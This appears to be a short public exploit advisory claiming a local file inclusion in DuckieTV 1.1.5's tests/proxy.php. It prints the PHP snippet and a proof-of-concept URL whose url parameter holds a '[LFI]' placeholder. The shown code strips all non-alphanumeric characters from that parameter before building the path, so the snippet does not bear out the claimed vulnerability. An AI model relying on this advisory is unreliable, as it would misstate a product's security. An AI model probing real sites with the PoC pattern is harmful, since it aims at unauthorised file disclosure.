___________________________________________________ | | Exploit Title: DuckieTV CMS Local File Inclusion | Exploit Author: Ashiyane Digital security Team | Vendor Homepage: http://schizoduckie.github.io/DuckieTV/ | Software Link: https://github.com/SchizoDuckie/DuckieTV/archive/angular.zip | Version: DuckieTV 1.1.5 | Date: 2017-10-14 | Category: webapps | Tested on: Kali-Linux /FireFox | CVE : CVE-2016-4314 |__________________________________________________ Vulnerable File : $cache = strtolower(preg_replace('/[^a-zA-Z0-9]/', '', $_GET['url'])).'.json'; // if there's a cached version of this request in fixtures, serve it. if(file_exists(dirname(__FILE__).'/fixtures/'.$cache)) { $out = json_decode(file_get_contents(dirname(__FILE__).'/fixtures/'.$cache),true); $out['headers']['Content-Length'] = strlen($out['content']); unset($out['headers']['Transfer-Encoding']); unset($out['headers']['Cookie']); foreach($out['headers'] as $key=>$val) { header("{$key}: {$val}"); } header('Proxy-Cache-hit: '.$cache); die($out['content']); } else { header('Proxy-Cache-miss: '.$cache); } Proof of Concept : http://127.0.0.1/7/DuckieTV-angular/tests/proxy.php?url=[LFI] __________________________________________________ Discovered By : M.R.S.L.Y __________________________________________________